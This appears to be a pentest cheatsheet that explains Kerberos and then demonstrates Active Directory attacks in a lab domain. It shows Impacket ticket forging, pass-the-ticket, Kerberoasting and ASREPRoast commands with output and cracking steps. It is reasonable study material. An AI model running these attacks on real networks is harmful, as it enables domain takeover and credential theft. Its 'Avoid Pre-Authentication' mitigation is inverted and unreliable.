Skip to content

Kerberos

Kerberos

  • Only an Authentication Protocol
  • Usually used in Active Directory
    • Gives the service the privileges of each user but the service needs to verify the access
  • Used over UDP or TCP (default port 88)

Tickets

Key Distribution Center or krbtgt key: which is derivated from the Windows service account krbtgt NTLM hash.
User key: which is derivated from user NTLM hash.
Service key: which is derivated from the NTLM hash of service owner, which can be an user or computer account.
Session key: which is negotiated between the user and Key Distribution Center.
Service session key: to be use between user and service.

Ticket Granting Service: Encrypted Ticket that a user can use to authenticate with a service. This key is encrypted with the service key

Ticket Granting Ticket: Ticket that is presented to the Key Distribution Center to get a Encrypted Ticket. This ticket is encrypted with the Key Distribution Center key.

Privilege Attribute Certificate

  • Contains the privileges of the user and it is signed with the Key Distribution Center key.
  • Services can verify the Certificate by querying the Key Distribution Center but it is usually not done.
    • Usually verification is done by checking the signature and not the privileges
  • A client can request a ticket without the PAC by adding the KERB-PA-PAC-REQUEST field to the ticket request

Message Types

KRB_AS_REQ: Used to request the TGT to KDC.
KRB_AS_REP: Used to deliver the TGT by KDC.
KRB_TGT_REQ: Used to request the TGS to KDC, using the TGT.
KRB_TGT_REP: Used to deliver the TGS by KDC.
KRB_AP_REQ: Used to authenticate a user against a service, using the TGS.
KRB_AP_REP: (Optional) Used by service to identify itself against the user.
KRB_ERROR: Message to communicate error conditions.
KERB_VERIFY_PAC_REQUEST: message to send to KDC the signature of PAC, and verify if it is correct.

sequenceDiagram
User ->> KDC (DC) : KRB_AS_REQ
KDC (DC) ->> User : KRB_AS_REP
User ->> KDC (DC) : KRB_TGT_REQ
KDC (DC) ->> User : KRB_TGT_REP
User ->> AP : KRB_AP_REQ
AP ->> KDC (DC) : KRB_VERIFY_PAC_REQ
KDC (DC) ->> AP : KRB_VERIFY_PAC_REP
AP ->> User : KRB_AP_REP (Optional)

Authentication

KRB_AS_REQ

For a user to get a ticket from the server the client sends a KRB_AS_REQ.

KRB_AS_REQ Contains:
- A encrypted timestamp with client key, to authenticate user and prevent replay attacks
- The encrypted timestamp is only necessary if user requires preauthentication, which is common, except if DONT_REQ_PREAUTH flag is set in user account.
- Username of authenticated user
- The service SPN associated with krbtgt account
- A Nonce generated by the user

KRB_AS_REP

After receiving the request, the KDC verifies the user identity by decrypting the timestamp. If the message is correct, then it must respond with a KRB_AS_REP.

KRB_AS_REP Contains:
- Username
- TGT
- Username
- Session key
- Expiration date of TGT
- PAC with user privileges, signed by KDC
- Encrypted Data with user key
- Session key
- Expiration date of TGT
- User nonce, to prevent replay attacks

Once finished, user already has the TGT, which can be used to request TGSs, and afterwards access to the services.

KRB_TGS_REQ

TGD Request to server

KRB_TGS_REQ includes:
- Data Encrypted with session key:
- Username
- Timestamp
- TGT
- SPN of requested service
- Nonce generated by user

KRB_TGS_RSP

KRB_TGS_REP includes:
- Username
- TGS, which contains:
- Service session key
- Username
- Expiration date of TGS
- PAC with user privileges, signed by KDC
- Encrypted data with session key:
- Service session key
- Expiration date of TGS
- User nonce, to prevent replay attacks

KRB_AP_REQ

To finish, if everything went well, the user already has a valid TGS to interact with service. In order to use it, user must send to the AP a KRB_AP_REQ message.

KRB_AP_REQ includes:
- TGS
- Data Encrypted with service session key:
- Username
- Timestamp, to avoid replay attacks

If the User has the correct user privileges they can access the service. The AP can verify the PAC against the KDC but this is not usually done.

Attacks

Pass The Key (PTK)

If an attacker gets the NTLM hash of any user, he could impersonate him against the KDC and then gain access to several services.

Getting a ticket from NTLM Hash:

root@kali:impacket-examples# python getTGT.py jurassic.park/velociraptor -hashes :2a3de7fe356ee524cc9f3d579f2e0aa7
Impacket v0.9.18 - Copyright 2018 SecureAuth Corporation

[*] Saving ticket in velociraptor.ccache

Using the ticket in attacks:

root@kali:impacket-examples# export KRB5CCNAME=/root/impacket-examples/velociraptor.ccache
root@kali:impacket-examples# python wmiexec.py jurassic.park/[email protected] -k -no-pass
Impacket v0.9.18 - Copyright 2018 SecureAuth Corporation

[*] Requesting shares on labwws02.jurassic.park.....
[*] Found writable share ADMIN$
[*] Uploading file yuiQeOUk.exe
[*] Opening SVCManager on labwws02.jurassic.park.....
[*] Creating service sBGq on labwws02.jurassic.park.....
[*] Starting service sBGq.....
[!] Press help for extra shell commands
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation. All rights reserved.

C:\Windows\system32>whoami
nt authority\system

C:\Windows\system32>

Pass The Ticket (PTT)

If an attacker is able to get the users ticket they can impersonate that user.

This can be gathered through through MitM attack since most are sent unencrypted but since most tickets are only active for 10 hours use it fast.

Location on Linux

[root@Lab-LSV01]# ls -lah /tmp/krb5*
-rw-------. 1 root         root         1.4K Mar  5 16:25 /tmp/krb5cc_0
-rw-------. 1 trex         domain users 1.2K Mar  7 10:08 /tmp/krb5cc_1120601113_ZFxZpK
-rw-------. 1 velociraptor domain users  490 Mar  7 10:14 /tmp/krb5cc_1120601115_uDoEa0

On Windows:

PS C:\Users\velociraptor> .\mimikatz.exe
mimikatz # sekurlsa::tickets /export

Golden Ticket and Silver Ticket

First you need to get the NTLM hash of krbtgt account. Once this is done a ticket can be created for a custom user with maximum permissions. This is still valid if that user changes his or her password. (Ticket Granting Ticket)

Requesting a Golden Ticket:

root@kali:impacket-examples# python ticketer.py -nthash 25b2076cda3bfd6209161a6c78a69c1c -domain-sid S-1-5-21-1339291983-1349129144-367733775 -domain jurassic.park stegosaurus
Impacket v0.9.18 - Copyright 2018 SecureAuth Corporation

[*] Creating basic skeleton ticket and PAC Infos
[*] Customizing ticket for jurassic.park/stegosaurus
[*] 	PAC_LOGON_INFO
[*] 	PAC_CLIENT_INFO_TYPE
[*] 	EncTicketPart
[*] 	EncAsRepPart
[*] Signing/Encrypting final ticket
[*] 	PAC_SERVER_CHECKSUM
[*] 	PAC_PRIVSVR_CHECKSUM
[*] 	EncTicketPart
[*] 	EncASRepPart
[*] Saving ticket in stegosaurus.ccache

Using the Golden ticket:

root@kali:impacket-examples# export KRB5CCNAME=/root/impacket-examples/stegosaurus.ccache
root@kali:impacket-examples# python wmiexec.py jurassic.park/[email protected] -k -no-pass
Impacket v0.9.18 - Copyright 2018 SecureAuth Corporation

[*] Requesting shares on lab-wdc02.jurassic.park.....
[*] Found writable share ADMIN$
[*] Uploading file goPntOCB.exe
[*] Opening SVCManager on lab-wdc02.jurassic.park.....
[*] Creating service DMmI on lab-wdc02.jurassic.park.....
[*] Starting service DMmI.....
[!] Press help for extra shell commands
Microsoft Windows [Version 6.3.9600]
(c) 2013 Microsoft Corporation. All rights reserved.

C:\Windows\system32>whoami
nt authority\system

C:\Windows\system32>

Silver Ticket is very similar but is used against a single service using a Ticket Granting Service. This means its full access but only to a specific service.

Requesting ticket for specific SPN:

root@kali:impacket-examples# python ticketer.py -nthash b18b4b218eccad1c223306ea1916885f -domain-sid S-1-5-21-1339291983-1349129144-367733775 -domain jurassic.park -spn cifs/labwws02.jurassic.park  stegosaurus
Impacket v0.9.18 - Copyright 2018 SecureAuth Corporation

[*] Creating basic skeleton ticket and PAC Infos
[*] Customizing ticket for jurassic.park/stegosaurus
[*] 	PAC_LOGON_INFO
[*] 	PAC_CLIENT_INFO_TYPE
[*] 	EncTicketPart
[*] 	EncTGSRepPart
[*] Signing/Encrypting final ticket
[*] 	PAC_SERVER_CHECKSUM
[*] 	PAC_PRIVSVR_CHECKSUM
[*] 	EncTicketPart
[*] 	EncTGSRepPart
[*] Saving ticket in stegosaurus.ccache

Using the ticket in attacks:

root@kali:impacket-examples# export KRB5CCNAME=/root/impacket-examples/stegosaurus.ccache 
root@kali:impacket-examples# python wmiexec.py jurassic.park/[email protected] -k -no-pass
Impacket v0.9.18 - Copyright 2018 SecureAuth Corporation

[*] Requesting shares on labwws02.jurassic.park.....
[*] Found writable share ADMIN$
[*] Uploading file JhRQHMnu.exe
[*] Opening SVCManager on labwws02.jurassic.park.....
[*] Creating service Drvl on labwws02.jurassic.park.....
[*] Starting service Drvl.....
[!] Press help for extra shell commands
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation. All rights reserved.

C:\Windows\system32>whoami
nt authority\system

C:\Windows\system32>

Kerberoasting

A Ticket Granting Service is encrypted with key derived from the NTLM hash of the service owners account.

Depending on the service different service owners will be attributed to different users. Checking to makes sure that those keys are not derived from a easily crackable password.

Using a valid user and password request Kerberost Hashes:

root@kali:impacket-examples# python GetUserSPNs.py jurassic.park/triceratops:Sh4rpH0rns -outputfile hashes.kerberoast
Impacket v0.9.18 - Copyright 2018 SecureAuth Corporation

ServicePrincipalName  Name          MemberOf  PasswordLastSet      LastLogon           
--------------------  ------------  --------  -------------------  -------------------
cloner/labwws02       velociraptor            2019-02-27 17:12:12  2019-03-05 09:35:27 

root@kali:impacket-examples# cat hashes.kerberoast 
$krb5tgs$23$*velociraptor$JURASSIC.PARK$cloner/labwws02*$b127187aceb93774a985bb1e528da85c$75cc3037a244f3422d6129bba79f79c67e79aca81b0b7dd551019424005abcfb8e232600fa968de2dcc9f10a44d13c17ac2be66bbb2640187dc174d81d9ebad0d691b36b3cbf4ca457678861748e2ab950f3066e0f50489415b934e4f6a2f2b7d8845cfd6a74279bad50da8c363174a07e51cbf39a2dd88bd74f1c839373cd9370ec1e2b7ebc5d6d05d49d34a75925d5983ab4849e211e57e93666f1fe9663b53620d2710e15f2c70837a4983db19c345b93f790244899b847d186197c37e966fc239ec750f91bd317fc2388ca421895052e2d57f742ab45c59275e95dfbb855ff11e5e893631164f6053ca0a6162c6b1be3ccdeb7fe2ce3a8634411b2b16ef03f558a5e0156bb8270ece6cf6b516af8172aa6071904d493c6fdf91738781371b68dfd9b4e1c2d6bcef3d665504194a703b08615d1b9c57ac794c37ab44dc2d57dff9677b0168aa7c078b190dddb2091ab63ca85868944cdbb4229a7a291028f193f94cb5c9a43c55b006cdd35df241b49d5464d3c05d5b7ec9eecd843335e45642892333b9760d06bc445d02558c2c30a2648a1018bc8493b8f73a6b0c07ffd052434239f0463b2344363656d6b6640efdc3e10fab04b99fc1f1487942c2b2c9ca7e89447aab3b1fb5adcb4b820d842a2ec713b788358e5c14d8ac3f0070058e6453297d4fb9538680ab152ce4ed3168cc6a58cc1c753b15d5de7fb98132ac3eec602ad611e8e03ed1c00c2bfa3b5bec1ea93f24b68b54fe48726f4e650dba34b3c4696b5f5e743cb5ace4b9b073dc718070d06e8f872abef2d4040350cd9e09091da47ab2fcef2e0d873afdcb9d7cf2236131f312d4e23004eb598efa064b871af82e618c31a2e82d28bc635ac3cbd000d725dd53217fb484178de3cd9bf4d20819c30c189ccc2ae349a333b628c6d41d01163b918def5ba089ac2cc6ff673dd64e1c2fef25fb599e009c1eca8e9e06cebc61fb0e7fc6922bc3edbdc60dd85a3f5b7412e8e46db80b55f577cc682892e66987a0e920872292a5cdd0f1a11fcc294461ccf86a53e75c9c8b0f9688919b4484986b7bcfb7612b117f98f5b0f4bf44ef0ad07245883ced1045b215a137d50a54f45a67168e6bed3dcb41f25b8ac307a4f3923d1545f0f6f1593db0a8b3032a3837b5c1715656e73c3ba0102e76dbbf47388bb5d1c334fc50598a57914a77c4c11059fe1b07b6342286ec2f6f38e7a5a946f40b7de01707f9681228904cb04434063c3dc7a6d26f301664514551ee20b69eb76d2a3f8fbc45b0d9cf9d236f8ac880c75b140dc471e6044b1c85af0e26393e057c5357f8ef223e845676e963eba6540d2cbee90cbb6d2422e9b1e34e6b2989a752c09b86d302219a45cd219f3fdf243f9b5c7002997daeff03f7cd437

Cracking Kerberost Hashes:

root@kali:impacket-examples# hashcat -m 13100 --force -a 0 hashes.kerberoast passwords_kerb.txt

ASREPRoast

If the DONT_REQ_PREAUTH is set in a users account an attacker can make a KRB_AS_REQ to the server as that user without knowing its password. When receiving the KRB_AS_REP the information will be encrypted with the users key that is derivated from the NTML hash of the user. This can be used to crack the users password.

Test Usernames for Non-preauth:

root@kali:impacket-examples# python GetNPUsers.py jurassic.park/ -usersfile usernames.txt -format hashcat -outputfile hashes.asreproast
Impacket v0.9.18 - Copyright 2018 SecureAuth Corporation

[-] User trex doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User triceratops doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
root@kali:impacket-examples# cat hashes.asreproast 
$krb5asrep$23$velociraptor@JURASSIC.PARK:7c2e70d3d46b4794b9549bba5c6b728e$599da4e9b7823dbc8432c188c0cf14151df3530601ad57ee0bc2730e0f10d3f1552b3552cee9431cf3f1b119d099d3cead7ea38bc29d5d83074035a2e1d7de5fa17c9925c75aac2717f49baae54958ec289301a1c23ca2ec1c5b5be4a495215d42e9cbb2feb8b7f58fb28151ac6ecb0684c27f14ecc35835aecc3eec1ec3056d831dd518f35103fd970f6d082da0ebaf51775afa8777f783898a1fa2cea7493767024ab3688ec4fe00e3d08a7fb20a32c2abf8bdf66c9c42f49576ae9671400be01b6156b4677be4c79d807ba61f4703d9acda0e66befc5b442660ac638983680ffa3ada7eacabad0841c9aee586

Cracking the Hash:

root@kali:impacket-examples# hashcat -m 18200 --force -a 0 hashes.asreproast passwords_kerb.txt

Kerberos brute-force

You can use bruteforcing to test ASREPRoast and get usernames.

kinit_brute.sh

Mitagations

  • Use strong passwords for all users
  • Avoid Pre-Authentication
  • Avoid executing services as other user accounts
  • Set verify PAC through HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa\Kerberos\Parameters\ValidateKdcPacSignature (DWORD) = 1.
  • Change passowrds regularly including the krbtgt account
  • Disable Kerberos weak encryption types

Kerberos Info
Kerberos Attacks
Kerberos cheatsheet